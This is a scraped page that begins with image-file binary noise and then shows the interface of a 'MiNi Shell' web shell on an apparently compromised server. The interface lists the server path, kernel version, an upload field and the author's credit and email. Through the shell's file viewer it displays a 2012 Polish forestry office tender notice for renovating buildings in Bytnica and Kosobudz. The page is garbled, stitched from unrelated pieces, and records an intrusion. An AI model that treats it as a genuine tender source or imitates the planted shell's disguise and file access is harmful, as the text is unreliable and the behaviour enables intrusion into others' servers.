JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120823/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120823/311030-N-2012.html

<p class="kh_header"><b>Bytnica: Remont budynku administracyjnego i budynku zaplecza technicznego w miejscowości Bytnica 160 oraz budynku mieszkalnego i gospodarczego w miejscowości Kosobudz 23</b><br>
<b>Numer ogłoszenia: 311030 - 2012; data zamieszczenia: 23.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Bytnica , Bytnica 160, 66-630 Bytnica, woj. lubuskie, tel. 068 3915754, faks 068 3915754.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_zielona_gora/nadl_bytnica</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont budynku administracyjnego i budynku zaplecza technicznego w miejscowości Bytnica 160 oraz budynku mieszkalnego i gospodarczego w miejscowości Kosobudz 23.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia:
Część I
Budynek administracyjny Nadleśnictwa Bytnica i budynek zaplecza technicznego w miejscowości Bytnica 160: 
 A) budynek administracyjny
Na zewnątrz obiektu:
- wymiana rynien i rur PCV na rynny i rury z blachy powlekanej w kolorze brązowym, z wykonaniem czyszczaków w rurach spustowych,
- naprawa okładzin SIDING na okapach (mocowanie, uzupełnienie listew kątowych w kolorze białym),
- czyszczenie dachówki karcherem w miejscach widocznych zabrudzeń i impregnacja,

Wewnątrz obiektu :
- malowanie ścian i sufitów farbami lateksowymi w kolorze jasnym,
- malowanie stolarki okiennej 2xkrotnie jednostronnie od środka,
- wymianę okładzin schodów na piętro, rozebranie istniejących okładzin z płytek gresowych, założenie nowych okładzin z płytek gresowych schodowych antypoślizgowych, wymiana cokolików schodowych,
- malowanie balustrad schodowych farbami ftalowymi,
- wymiana pojedynczych płytek gresowych w korytarzu na parterze,
- rozebranie okładzin z suchego tynku, skosów okiennych przy oknach na piętrze, uzupełnienie ocieplenia wełną mineralną 2x5cm, uzupełnienie rusztów z kształtowników oc, obłożenie płytami suchego tynku, szpachlowanie 2 x krotne

B) budynek zaplecza technicznego:
- umocowanie, uszczelnienie i wypoziomowanie istniejących na budynku rynien PCV z częściową wymianą zniszczonych odcinków na nowe,
- umocowanie i uszczelnienie istniejących rur spustowych z PCV,
- uzupełnienie brakujących paneli winylowych SIDING w kolorze białym na okapach,
- naprawa okładzin SIDING na okapach (mocowanie, uzupełnienie listew kątowych w kolorze białym),
- docieplenie drzwi garażowych 3 kpl. styropianem twardym FS20 (EPS 100) naklejonym na drzwi stalowe garażowe uchylne,
- wykonanie w trzech garażach sufitu podwieszonego tj. wykonanie konstrukcji nośnej z impregnowanych kantówek 6x14cm, umocowanie podwójnego rusztu z kształtowników oc do ułożenia wełny mineralnej gr 15cm, umocowanie folii paroszczelnej, umocowanie od spodu na ruszcie płyt suchego tynku wodoodpornych, malowanie 2xkrotne płyt gipsowych,

Część II
Budynek mieszkalny i gospodarczy w miejscowości Kosobudz 23
A) budynek mieszkalny
- wymiana stolarki okiennej na okna z profili PCV z założeniem nowych podokienników,,
- wymiana stolarki drzwiowej - drzwi wewnętrznych z ościeżnicami pełnymi,
- malowanie elewacji farbami silikatowymi,
- naprawa nawierzchni i chodnika przy domu,
- uzupełnienie nawierzchni podjazdu kruszywem i zagęszczenie

B) budynek gospodarczy
- zerwanie posadzki z wykładziny PCV, ułożenie płyty OSB 15mm z wypoziomowaniem,
- ułożenie nowej z wykładziny PCV trudnościeralnej wywiniętej na ściany zgrzewanej,
- zmycie i oczyszczenie starej farby ścian i sufitów na korytarzu wejściowym
- przygotowanie powierzchni tynków ścian i sufitów z szpachlowaniem nierówności w pomieszczeniu kancelarii
- wykonanie sufitu podwieszonego w technologii suchych tynków,
- wykonanie gładzi gipsowej ścian i sufitów, dwuwarstwowo,
- malowanie ścian i sufitów 2x farbą, sufity na biało, ściany w kolorze pastelowym do uzgodnienia z użytkownikiem,
- malowanie 2x farbą ftalową odeskowanego wejścia na strych,,
- montaż kratek wentylacyjnych,
- wymiana stolarki okiennej na okna z profili PCV z założeniem nowych podokienników i kraty na okno 1 sztuki,
- wymiana stolarki drzwiowej - drzwi zewnętrznych na wejściowe metalowe z 2 zamkami i wejściowe do kancelarii z 1 zamkiem,
- demontaż osprzętu elektrycznego,
- demontaż opraw oświetleniowych,
- montaż nowych gniazd i łączników podtynkowych,
- montaż nowych opraw oświetleniowych w suficie podwieszonym,
- wykonanie pomiarów elektrycznych, (przeciwporażeniowych, ciągłości izolacji, ciągłości przewodów),
- wymiana nawierzchni spocznika przy schodach wejściowych na nawierzchnie z kostki polbrukowej,
- wymiana obróbki blacharskiej przy kominie.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających zgodnie z art. 67 ust. 1 pkt. 6 ustawy Pzp. stanowiących nie więcej niż 50 % wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zammawiający przewiduje wniesienie wadium w wysokości 2.000,00 zł (słownie złotych: dwa tysięce 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia, potwierdzającego spełnienie warunków określonych w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się doświadczeniem w wykonaniu w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie - co najmniej 2 robót remontowych polegających na remoncie obiektów kubaturowych  /mieszkalnych,gospodarczych/, przy czym łączna wartość wszystkich wykazanych robót nie może być mniejsza niż 250.000,00 zł brutto. Wykonawca może polegać na wiedzy i doświadczeniu innego lub innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunku. W takiej sytuacji Wykonawca zobowiązany będzie udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania do dyspozycji tych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (wymagany jest oryginał oświadczenia lub jego notarialna kopia).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia, potwierdzającego spełnienie warunków określonych w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowany personel, w szczególności: Kierownika robót budowlanych - wymagane uprawnienia budowlane do kierowania i nadzorowania robót.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać aktualne ubezpieczenie OC z tytułu prowadzonej działalności gospodarczej na kwotę co najmniej 150.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych każda ze stron może żądać wprowadzenia istotnych zmian w umowie w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jeśli wystąpi co najmniej jedna z niżej wymienionych okoliczności: a)w wyniku realizacji zasad i wytycznych władz zwierzchnich Zamawiający będzie zobowiązany do ograniczenia środków przewidzianych na sfinansowanie zamówienia, b)w trakcie realizacji zamówienia zostanie ujawniony błąd w dokumentacji projektowej zauważony w trakcie realizacji umowy, c)z powodu nadzwyczajnej zmiany stosunków spełnienie świadczenia wyłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażącą stratą (art. 3571 KC), d)nastąpi wywierająca bezpośredni wpływ na dalsze wykonywanie umowy zmiana obowiązującego prawa powszechnego (ustaw, rozporządzeń, bądź przepisów wewnętrznych, obowiązujących w Państwowym Gospodarstwie Leśnym Lasy Państwowe (zarządzeń, decyzji i wytycznych Dyrektora Generalnego Lasów Państwowych), e)wystąpi redukcja robót objętych zamówieniem, związana z wykonaniem robót zamiennych lub wykonanie robót dodatkowych, f)wystąpi zmiana Wykonawcy w przypadku sukcesji generalnej następującej w wyniku dozwolonego przekształcenia podmiotu bądź dziedziczenia oraz w przypadkach szczególnej sukcesji z mocy prawa (np. łączenie, dzielenie, przekształcenie spółek), g)wystąpi konieczność zmiany podwykonawcy, powierzenia wykonania części zakresu umowy podwykonawcy lub zmiany zakresu wykonania części zamówienia przez podwykonawcę, h)w przypadku wystąpienia niesprzyjających warunków pogodowych, uniemożliwiających wykonanie części lub całości umowy w ustalonym terminie, i)w razie konieczności udzielenia Wykonawcy zamówienia dodatkowego w rozumieniu ustawy Pzp, j)w razie konieczności dokonania innej zmiany dokumentacji projektowej (np. w razie ujawnienia potrzeby wykonania robót zamiennych). Pozostałe zmiany a)w przypadku rezygnacji przez zamawiającego z realizacji części przedmiotu umowy - w takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł w związku z wynikającymi z umowy planowaniami świadczeniami, b)w przypadku kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami - w takim przypadku zmiany w umowie zostaną ograniczone do zmian koniecznych powodujących uniknięcie kolizji, a wynagrodzenie zostanie ustalone z zachowaniem zasady opisanej w Specyfikacji IWZ i ofercie wykonawcy,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_zielona_gora/nadl_bytnica<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego: Nadleśnictwo Bytnica, Bytnica 160, 66-630 Bytnica, pokój nr 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.09.2012 godzina 11:00, miejsce: Siedziba Zamawiającego: Nadleśnictwo Bytnica, Bytnica 160, 66-630 Bytnica, pokój nr 6 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont budynku administracyjnego i budynku zaplecza technicznego w miejscowości Bytnica 160.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje: A) budynek administracyjny Na zewnątrz obiektu: -wymiana rynien i rur PCV na rynny i rury z blachy powlekanej w kolorze brązowym, z wykonaniem czyszczaków w rurach spustowych, -naprawa okładzin SIDING na okapach (mocowanie, uzupełnienie listew kątowych w kolorze białym), -czyszczenie dachówki karcherem w miejscach widocznych zabrudzeń i impregnacja, Wewnątrz obiektu : -malowanie ścian i sufitów farbami lateksowymi w kolorze jasnym, -malowanie stolarki okiennej 2xkrotnie jednostronnie od środka, -wymianę okładzin schodów na piętro, rozebranie istniejących okładzin z płytek gresowych, założenie nowych okładzin z płytek gresowych schodowych antypoślizgowych, wymiana cokolików schodowych, -malowanie balustrad schodowych farbami ftalowymi, -wymiana pojedynczych płytek gresowych w korytarzu na parterze, -rozebranie okładzin z suchego tynku, skosów okiennych przy oknach na piętrze, uzupełnienie ocieplenia wełną mineralną 2x5cm, uzupełnienie rusztów z kształtowników oc, obłożenie płytami suchego tynku, szpachlowanie 2 x krotne B) budynek zaplecza technicznego: -umocowanie, uszczelnienie i wypoziomowanie istniejących na budynku rynien PCV z częściową wymianą zniszczonych odcinków na nowe, -umocowanie i uszczelnienie istniejących rur spustowych z PCV, -uzupełnienie brakujących paneli winylowych SIDING w kolorze białym na okapach, -naprawa okładzin SIDING na okapach (mocowanie, uzupełnienie listew kątowych w kolorze białym), -docieplenie drzwi garażowych 3 kpl. styropianem twardym FS20 (EPS 100) naklejonym na drzwi stalowe garażowe uchylne, -wykonanie w trzech garażach sufitu podwieszonego tj. wykonanie konstrukcji nośnej z impregnowanych kantówek 6x14cm, umocowanie podwójnego rusztu z kształtowników oc do ułożenia wełny mineralnej gr 15cm, umocowanie folii paroszczelnej, umocowanie od spodu na ruszcie płyt suchego tynku wodoodpornych, malowanie 2xkrotne płyt gipsowych,...</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont budynku mieszkalnego i gospodarczego w miejscowości Kosobudz 23.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres remontu: A) budynek mieszkalny -wymiana stolarki okiennej na okna z profili PCV z założeniem nowych podokienników,, -wymiana stolarki drzwiowej - drzwi wewnętrznych z ościeżnicami pełnymi, -malowanie elewacji farbami silikatowymi, -naprawa nawierzchni i chodnika przy domu, -uzupełnienie nawierzchni podjazdu kruszywem i zagęszczenie B) budynek gospodarczy -zerwanie posadzki z wykładziny PCV, ułożenie płyty OSB 15mm z wypoziomowaniem, -ułożenie nowej z wykładziny PCV trudnościeralnej wywiniętej na ściany zgrzewanej, -zmycie i oczyszczenie starej farby ścian i sufitów na korytarzu wejściowym -przygotowanie powierzchni tynków ścian i sufitów z szpachlowaniem nierówności w pomieszczeniu kancelarii -wykonanie sufitu podwieszonego w technologii suchych tynków, -wykonanie gładzi gipsowej ścian i sufitów, dwuwarstwowo, -malowanie ścian i sufitów 2x farbą, sufity na biało, ściany w kolorze pastelowym do uzgodnienia z użytkownikiem, -malowanie 2x farbą ftalową odeskowanego wejścia na strych,, -montaż kratek wentylacyjnych, -wymiana stolarki okiennej na okna z profili PCV z założeniem nowych podokienników i kraty na okno 1 sztuki, -wymiana stolarki drzwiowej - drzwi zewnętrznych na wejściowe metalowe z 2 zamkami i wejściowe do kancelarii z 1 zamkiem, -demontaż osprzętu elektrycznego, -demontaż opraw oświetleniowych, -montaż nowych gniazd i łączników podtynkowych, -montaż nowych opraw oświetleniowych w suficie podwieszonym, -wykonanie pomiarów elektrycznych, (przeciwporażeniowych, ciągłości izolacji, ciągłości przewodów), -wymiana nawierzchni spocznika przy schodach wejściowych na nawierzchnie z kostki polbrukowej, -wymiana obróbki blacharskiej przy kominie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com